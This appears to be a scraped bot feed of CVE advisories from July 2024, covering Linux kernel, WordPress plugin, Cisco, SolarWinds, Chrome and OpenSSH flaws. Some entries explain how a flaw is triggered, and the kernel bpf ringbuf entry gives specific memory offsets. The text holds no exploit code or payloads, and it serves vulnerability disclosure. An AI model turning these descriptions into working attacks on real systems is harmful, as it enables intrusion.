🚨 CVE-2022-48840In the Linux kernel, the following vulnerability has been resolved:iavf: Fix hang during reboot/shutdownRecent commit 974578017fc1 ("iavf: Add waiting so the port isinitialized in remove") adds a wait-loop at the beginning ofiavf_remove() to ensure that port initialization is finishedprior unregistering net device. This causes a regressionin reboot/shutdown scenario because in this case callbackiavf_shutdown() is called and this callback detaches the device,makes it down if it is running and sets its state to __IAVF_REMOVE.Later shutdown callback of associated PF driver (e.g. ice_shutdown)is called. That callback calls among other things sriov_disable()that calls indirectly iavf_remove() (see stack trace below).As the adapter state is already __IAVF_REMOVE then the mentionedloop is end-less and shutdown process hangs.The patch fixes this by checking adapter's state at the beginningof iavf_remove() and skips the rest of the function if the adapteris already in remove state (shutdown is in progress).Reproducer:1. Create VF on PF driven by ice or i40e driver2. Ensure that the VF is bound to iavf driver3. Reboot[52625.981294] sysrq: SysRq : Show Blocked State[52625.988377] task:reboot state:D stack: 0 pid:17359 ppid: 1 f2[52625.996732] Call Trace:[52625.999187] __schedule+0x2d1/0x830[52626.007400] schedule+0x35/0xa0[52626.010545] schedule_hrtimeout_range_clock+0x83/0x100[52626.020046] usleep_range+0x5b/0x80[52626.023540] iavf_remove+0x63/0x5b0 [iavf][52626.027645] pci_device_remove+0x3b/0xc0[52626.031572] device_release_driver_internal+0x103/0x1f0[52626.036805] pci_stop_bus_device+0x72/0xa0[52626.040904] pci_stop_and_remove_bus_device+0xe/0x20[52626.045870] pci_iov_remove_virtfn+0xba/0x120[52626.050232] sriov_disable+0x2f/0xe0[52626.053813] ice_free_vfs+0x7c/0x340 [ice][52626.057946] ice_remove+0x220/0x240 [ice][52626.061967] ice_shutdown+0x16/0x50 [ice][52626.065987] pci_device_shutdown+0x34/0x60[52626.070086] device_shutdown+0x165/0x1c5[52626.074011] kernel_restart+0xe/0x30[52626.077593] __do_sys_reboot+0x1d2/0x210[52626.093815] do_syscall_64+0x5b/0x1a0[52626.097483] entry_SYSCALL_64_after_hwframe+0x65/0xca🎖@cveNotify |
|
| 2024-07-17 20:07:25 |
🚨 CVE-2024-21748Missing Authorization vulnerability in Icegram.This issue affects Icegram: from n/a through 3.1.21.🎖@cveNotify |
|
| 2024-07-17 20:07:24 |
🚨 CVE-2024-35709Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows Stored XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.5.4.🎖@cveNotify |
|
| 2024-07-17 19:37:26 |
🚨 CVE-2024-40420A Server-Side Template Injection (SSTI) vulnerability in the edit theme function of openCart project v4.0.2.3 allows attackers to execute arbitrary code via injecting a crafted payload.🎖@cveNotify |
|
| 2024-07-17 19:37:25 |
🚨 CVE-2024-6220The 简数采集器 (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-07-17 19:37:24 |
🚨 CVE-2024-1890Vulnerability whereby an attacker could send a malicious link to an authenticated operator, which could allow remote attackers to perform a clickjacking attack on Sunny WebBox firmware version 1.6.1 and earlier.🎖@cveNotify |
|
| 2024-07-17 18:37:31 |
🚨 CVE-2024-40641Nuclei is a fast and customizable vulnerability scanner based on simple YAML based DSL. In affected versions it a way to execute code template without -code option and signature has been discovered. Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute). This issue has been addressed in version 3.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-17 18:37:30 |
🚨 CVE-2024-40639Gotenberg provides a developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more! Prior to version 8.1.0, the default value for the flag `--chromium-deny-list` allowed to display some internal files from the Gotenberg container. Version 8.1.0 provides a new default value fixing the issue. Prior to version 8.1.0, Gotenberg uses the standard `regexp` Go library, which does not support negative lookahead. Therefore, the new default value for the `--chromium-deny-list` is not applicable. However, one could find an alternative using either or both `--chromium-deny-list` and `--chromium-allow-list` flags. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-17 18:37:26 |
🚨 CVE-2024-40633Sylius is an Open Source eCommerce Framework on Symfony. A security vulnerability was discovered in the `/api/v2/shop/adjustments/{id}` endpoint, which retrieves order adjustments based on incremental integer IDs. The vulnerability allows an attacker to enumerate valid adjustment IDs and retrieve order tokens. Using these tokens, an attacker can access guest customer order details - sensitive guest customer information. The issue is fixed in versions: 1.12.19, 1.13.4 and above. The `/api/v2/shop/adjustments/{id}` will always return `404` status. Users are advised to upgrade. Users unable to upgrade may alter their config to mitigate this issue. Please see the linked GHSA for details.🎖@cveNotify |
|
| 2024-07-17 18:37:25 |
🚨 CVE-2023-42010IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.5 and 6.2.0.0 through 6.2.0.2 could disclose sensitive information in the HTTP response using man in the middle techniques. IBM X-Force ID: 265507.🎖@cveNotify |
|
| 2024-07-17 18:37:24 |
🚨 CVE-2024-37555Unrestricted Upload of File with Dangerous Type vulnerability in ZealousWeb Generate PDF using Contact Form 7.This issue affects Generate PDF using Contact Form 7: from n/a through 4.0.6.🎖@cveNotify |
|
| 2024-07-17 17:37:37 |
🚨 CVE-2024-20435A vulnerability in the CLI of Cisco AsyncOS for Secure Web Appliance could allow an authenticated, local attacker to execute arbitrary commands and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the CLI. An attacker could exploit this vulnerability by authenticating to the system and executing a crafted command on the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root. To successfully exploit this vulnerability, an attacker would need at least guest credentials.🎖@cveNotify |
|
| 2024-07-17 17:37:36 |
🚨 CVE-2024-20419A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.🎖@cveNotify |
|
| 2024-07-17 17:37:32 |
🚨 CVE-2024-20401A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system. This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device. Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.🎖@cveNotify |
|
| 2024-07-17 17:37:31 |
🚨 CVE-2024-20396A vulnerability in the protocol handlers of Cisco Webex App could allow an unauthenticated, remote attacker to gain access to sensitive information. This vulnerability exists because the affected application does not safely handle file protocol handlers. An attacker could exploit this vulnerability by persuading a user to follow a link that is designed to cause the application to send requests. If the attacker can observe transmitted traffic in a privileged network position, a successful exploit could allow the attacker to capture sensitive information, including credential information, from the requests.🎖@cveNotify |
|
| 2024-07-17 17:37:30 |
🚨 CVE-2024-20395A vulnerability in the media retrieval functionality of Cisco Webex App could allow an unauthenticated, adjacent attacker to gain access to sensitive session information. This vulnerability is due to insecure transmission of requests to backend services when the app accesses embedded media, such as images. An attacker could exploit this vulnerability by sending a message with embedded media that is stored on a messaging server to a targeted user. If the attacker can observe transmitted traffic in a privileged network position, a successful exploit could allow the attacker to capture session token information from insecurely transmitted requests and possibly reuse the captured session information to take further actions as the targeted user.🎖@cveNotify |
|
| 2024-07-17 17:37:26 |
🚨 CVE-2024-20296A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to upload arbitrary files to an affected device. To exploit this vulnerability, an attacker would need at least valid Policy Admin credentials on the affected device. This vulnerability is due to improper validation of files that are uploaded to the web-based management interface. An attacker could exploit this vulnerability by uploading arbitrary files to an affected device. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.🎖@cveNotify |
|
| 2024-07-17 17:37:25 |
🚨 CVE-2024-36082SQL injection vulnerability in Music Store - WordPress eCommerce versions prior to 1.1.14 allows a remote authenticated attacker with an administrative privilege to execute arbitrary SQL commands. Information stored in the database may be obtained or altered by the attacker.🎖@cveNotify |
|
| 2024-07-17 17:37:24 |
🚨 CVE-2024-35056NASA AIT-Core v2.5.2 was discovered to contain multiple SQL injection vulnerabilities via the query_packets and insert functions.🎖@cveNotify |
|
| 2024-07-17 17:07:24 |
🚨 CVE-2024-36967In the Linux kernel, the following vulnerability has been resolved:KEYS: trusted: Fix memory leak in tpm2_key_encode()'scratch' is never freed. Fix this by calling kfree() in the success, andin the error case.🎖@cveNotify |
|
| 2024-07-17 16:37:30 |
🚨 CVE-2024-35060An issue in the YAML Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands via supplying a crafted YAML file.🎖@cveNotify |
|
| 2024-07-17 16:37:26 |
🚨 CVE-2024-35059An issue in the Pickle Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands.🎖@cveNotify |
|
| 2024-07-17 16:37:25 |
🚨 CVE-2024-5042A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.🎖@cveNotify |
|
| 2024-07-17 16:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-07-17 16:07:25 |
🚨 CVE-2024-37984Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-17 16:07:24 |
🚨 CVE-2024-35261Azure Network Watcher VM Extension Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:37:44 |
🚨 CVE-2024-23471The SolarWinds Access Rights Manager was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service resulting in remote code execution.🎖@cveNotify |
|
| 2024-07-17 15:37:43 |
🚨 CVE-2024-23469SolarWinds Access Rights Manager (ARM) is susceptible to a Remote Code Execution vulnerability. If exploited, this vulnerability allows an unauthenticated user to perform the actions with SYSTEM privileges.🎖@cveNotify |
|
| 2024-07-17 15:37:42 |
🚨 CVE-2024-23467The SolarWinds Access Rights Manager was susceptible to a Directory Traversal and Information Disclosure Vulnerability. This vulnerability allows an unauthenticated user to perform remote code execution.🎖@cveNotify |
|
| 2024-07-17 15:37:38 |
🚨 CVE-2024-23465The SolarWinds Access Rights Manager was found to be susceptible to an authentication bypass vulnerability. This vulnerability allows an unauthenticated user to gain domain admin access within the Active Directory environment.🎖@cveNotify |
|
| 2024-07-17 15:37:37 |
🚨 CVE-2023-7272In Eclipse Parsson before 1.0.4 and 1.1.3, a document with a large depth of nested objects can allow an attacker to cause a Java stack overflow exception and denial of service. Eclipse Parsson allows processing (e.g. parse, generate, transform and query) JSON documents.🎖@cveNotify |
|
| 2024-07-17 15:37:36 |
🚨 CVE-2024-30098Windows Cryptographic Services Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:37:32 |
🚨 CVE-2024-30079Windows Remote Access Connection Manager Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:37:31 |
🚨 CVE-2024-30061Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:37:30 |
🚨 CVE-2017-16532The get_endpoints function in drivers/usb/misc/usbtest.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.🎖@cveNotify |
|
| 2024-07-17 15:37:27 |
🚨 CVE-2017-16531drivers/usb/core/config.c in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.🎖@cveNotify |
|
| 2024-07-17 15:37:26 |
🚨 CVE-2015-2925The prepend_path function in fs/dcache.c in the Linux kernel before 4.2.4 does not properly handle rename actions inside a bind mount, which allows local users to bypass an intended container protection mechanism by renaming a directory, related to a "double-chroot attack."🎖@cveNotify |
|
| 2024-07-17 15:37:25 |
🚨 CVE-2015-7613Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c.🎖@cveNotify |
|
| 2024-07-17 15:07:31 |
🚨 CVE-2024-35270Windows iSCSI Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:07:30 |
🚨 CVE-2024-35267Azure DevOps Server Spoofing Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:07:26 |
🚨 CVE-2024-30013Windows MultiPoint Services Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:07:25 |
🚨 CVE-2024-26184Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-17 15:07:24 |
🚨 CVE-2024-36823The encrypt() function of Ninja Core v7.0.0 was discovered to use a weak cryptographic algorithm, leading to a possible leakage of sensitive information.🎖@cveNotify |
|
| 2024-07-17 14:07:30 |
🚨 CVE-2024-5756The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.23 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-17 14:07:26 |
🚨 CVE-2024-5503The WP Blog Post Layouts plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.3. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-07-17 14:07:25 |
🚨 CVE-2024-5686The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ attribute within the plugin's Team Members widget in all versions up to, and including, 1.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-17 14:07:24 |
🚨 CVE-2024-5605The Media Library Assistant plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter within the mla_tag_cloud Shortcode in all versions up to, and including, 3.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-17 13:37:31 |
🚨 CVE-2024-33181Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceMac parameter at ip/goform/addWifiMacFilter.🎖@cveNotify |
|
| 2024-07-17 13:37:30 |
🚨 CVE-2024-6076The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-17 13:37:26 |
🚨 CVE-2024-6074The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-17 13:37:25 |
🚨 CVE-2024-3961The ConvertKit – Email Newsletter, Email Marketing, Subscribers and Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tag_subscriber function in all versions up to, and including, 2.4.9. This makes it possible for unauthenticated attackers to subscribe users to tags. Financial damages may occur to site owners if their API quota is exceeded.🎖@cveNotify |
|
| 2024-07-17 10:37:24 |
🚨 CVE-2024-31411Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes.Such a dangerous type might be an executable file that may lead to a remote code execution (RCE).The unrestricted upload is only possible for authenticated and authorized users.This issue affects Apache StreamPipes: through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.🎖@cveNotify |
|
| 2024-07-17 08:37:29 |
🚨 CVE-2024-6220The 简数采集器 (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-07-17 08:37:26 |
🚨 CVE-2024-5703The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized API access due to a missing capability check in all versions up to, and including, 5.7.26. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access the API (provided it is enabled) and add, edit, and delete audience users.🎖@cveNotify |
|
| 2024-07-17 08:37:25 |
🚨 CVE-2024-39863Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.🎖@cveNotify |
|
| 2024-07-17 08:37:24 |
🚨 CVE-2024-6047Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-07-17 07:37:38 |
🚨 CVE-2024-6669The AI ChatBot for WordPress – WPBot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-07-17 07:37:31 |
🚨 CVE-2024-6467The BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin plugin for WordPress is vulnerable to Arbitrary File Read to Arbitrary File Creation in all versions up to, and including, 1.1.5 via the 'bookingpress_save_lite_wizard_settings_func' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files that contain the content of files on the server, allowing the execution of any PHP code in those files or the exposure of sensitive information.🎖@cveNotify |
|
| 2024-07-17 07:37:30 |
🚨 CVE-2024-5254The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_banner shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-17 07:37:26 |
🚨 CVE-2024-5252The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_table shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-17 07:37:25 |
🚨 CVE-2024-41009In the Linux kernel, the following vulnerability has been resolved:bpf: Fix overrunning reservations in ringbufThe BPF ring buffer internally is implemented as a power-of-2 sized circularbuffer, with two logical and ever-increasing counters: consumer_pos is theconsumer counter to show which logical position the consumer consumed thedata, and producer_pos which is the producer counter denoting the amount ofdata reserved by all producers.Each time a record is reserved, the producer that "owns" the record willsuccessfully advance producer counter. In user space each time a record isread, the consumer of the data advanced the consumer counter once it finishedprocessing. Both counters are stored in separate pages so that from userspace, the producer counter is read-only and the consumer counter is read-write.One aspect that simplifies and thus speeds up the implementation of bothproducers and consumers is how the data area is mapped twice contiguouslyback-to-back in the virtual memory, allowing to not take any special measuresfor samples that have to wrap around at the end of the circular buffer dataarea, because the next page after the last data page would be first data pageagain, and thus the sample will still appear completely contiguous in virtualmemory.Each record has a struct bpf_ringbuf_hdr { u32 len; u32 pg_off; } header forbook-keeping the length and offset, and is inaccessible to the BPF program.Helpers like bpf_ringbuf_reserve() return `(void *)hdr + BPF_RINGBUF_HDR_SZ`for the BPF program to use. Bing-Jhong and Muhammad reported that it is howeverpossible to make a second allocated memory chunk overlapping with the firstchunk and as a result, the BPF program is now able to edit first chunk'sheader.For example, consider the creation of a BPF_MAP_TYPE_RINGBUF map with sizeof 0x4000. Next, the consumer_pos is modified to 0x3000 /before/ a call tobpf_ringbuf_reserve() is made. This will allocate a chunk A, which is in[0x0,0x3008], and the BPF program is able to edit [0x8,0x3008]. Now, letsallocate a chunk B with size 0x3000. This will succeed because consumer_poswas edited ahead of time to pass the `new_prod_pos - cons_pos > rb->mask`check. Chunk B will be in range [0x3008,0x6010], and the BPF program is ableto edit [0x3010,0x6010]. Due to the ring buffer memory layout mentionedearlier, the ranges [0x0,0x4000] and [0x4000,0x8000] point to the same datapages. This means that chunk B at [0x4000,0x4008] is chunk A's header.bpf_ringbuf_submit() / bpf_ringbuf_discard() use the header's pg_off to thenlocate the bpf_ringbuf itself via bpf_ringbuf_restore_from_rec(). Once chunkB modified chunk A's header, then bpf_ringbuf_commit() refers to the wrongpage and could cause a crash.Fix it by calculating the oldest pending_pos and check whether the rangefrom the oldest outstanding record to the newest would span beyond the ringbuffer size. If that is the case, then reject the request. We've tested withthe ring buffer benchmark in BPF selftests (./benchs/run_bench_ringbufs.sh)before/after the fix and while it seems a bit slower on some benchmarks, itis still not significantly enough to matter.🎖@cveNotify |
|
| 2024-07-17 05:37:25 |
🚨 CVE-2024-5154A flaw was found in cri-o. A malicious container can create a symbolic link to arbitrary files on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.🎖@cveNotify |
|
| 2024-07-17 05:37:24 |
🚨 CVE-2024-5037A flaw was found in OpenShift's Telemeter. If certain conditions are in place, an attacker can use a forged token to bypass the issue ("iss") check during JSON web token (JWT) authentication.🎖@cveNotify |
|
| 2024-07-17 04:37:25 |
🚨 CVE-2024-6808A vulnerability was found in itsourcecode Simple Task List 1.0. It has been classified as critical. This affects the function insertUserRecord of the file signUp.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271707.🎖@cveNotify |
|
| 2024-07-17 04:37:24 |
🚨 CVE-2024-6807A vulnerability was found in SourceCodester Student Study Center Desk Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /sscdms/classes/Users.php?f=save of the component HTTP POST Request Handler. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271706 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-17 03:37:24 |
🚨 CVE-2024-6535A flaw was found in Skupper. When Skupper is initialized with the console-enabled and with console-auth set to Openshift, it configures the openshift oauth-proxy with a static cookie-secret. In certain circumstances, this may allow an attacker to bypass authentication to the Skupper console via a specially-crafted cookie.🎖@cveNotify |
|
| 2024-07-17 03:07:37 |
🚨 CVE-2024-4475The WP Logs Book WordPress plugin through 1.0.1 does not have CSRF check when clearing logs, which could allow attackers to make a logged in admin clear the logs them via a CSRF attack🎖@cveNotify |
|
| 2024-07-17 03:07:36 |
🚨 CVE-2024-4382The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings via CSRF attacks🎖@cveNotify |
|
| 2024-07-17 03:07:31 |
🚨 CVE-2024-5344The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘forgoturl’ attribute within the plugin's WP Login & Register widget in all versions up to, and including, 5.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-17 03:07:30 |
🚨 CVE-2024-1955The Hide Dashboard Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'warning_notices_settings' function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's settings.🎖@cveNotify |
|
| 2024-07-17 02:37:26 |
🚨 CVE-2024-6802A vulnerability, which was classified as critical, was found in SourceCodester Computer Laboratory Management System 1.0. Affected is an unknown function of the file /lms/classes/Master.php?f=save_record. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271704.🎖@cveNotify |
|
| 2024-07-17 02:37:25 |
🚨 CVE-2024-6595An issue was discovered in GitLab CE/EE affecting all versions starting from 11.8 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2 where it was possible to upload an NPM package with conflicting package data.🎖@cveNotify |
|
| 2024-07-17 02:37:24 |
🚨 CVE-2023-41989The issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1. An attacker may be able to execute arbitrary code as root from the Lock Screen.🎖@cveNotify |
|
| 2024-07-16 23:37:38 |
🚨 CVE-2024-21123Vulnerability in the Oracle Database Core component of Oracle Database Server. Supported versions that are affected are 19.3-19.23. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with logon to the infrastructure where Oracle Database Core executes to compromise Oracle Database Core. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Core accessible data. CVSS 3.1 Base Score 2.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-07-16 23:37:32 |
🚨 CVE-2024-21122Vulnerability in the PeopleSoft Enterprise HCM Shared Components product of Oracle PeopleSoft (component: Text Catalog). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Shared Components. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise HCM Shared Components, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Shared Components accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Shared Components accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-07-16 23:37:31 |
🚨 CVE-2023-7012Insufficient data validation in Permission Prompts in Google Chrome prior to 117.0.5938.62 allowed an attacker who convinced a user to install a malicious app to potentially perform a sandbox escape via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-07-16 23:37:30 |
🚨 CVE-2023-7011Inappropriate implementation in Picture in Picture in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-07-16 23:37:26 |
🚨 CVE-2023-4860Inappropriate implementation in Skia in Google Chrome prior to 115.0.5790.98 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-16 23:37:25 |
🚨 CVE-2019-25154Inappropriate implementation in iframe in Google Chrome prior to 77.0.3865.75 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-07-16 22:37:32 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-16 22:37:26 |
🚨 CVE-2024-3128** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in Replify-Messenger 1.0 on Android. This issue affects some unknown processing of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-258869 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The vendor was contacted early and responded very quickly. He does not intend to maintain the app anymore and will revoke the availability in the Google Play Store.🎖@cveNotify |
|
| 2024-07-16 22:37:25 |
🚨 CVE-2023-5154** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-8000 up to 20151231 and classified as critical. This vulnerability affects unknown code of the file /sysmanage/changelogo.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-240250 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-07-16 22:37:24 |
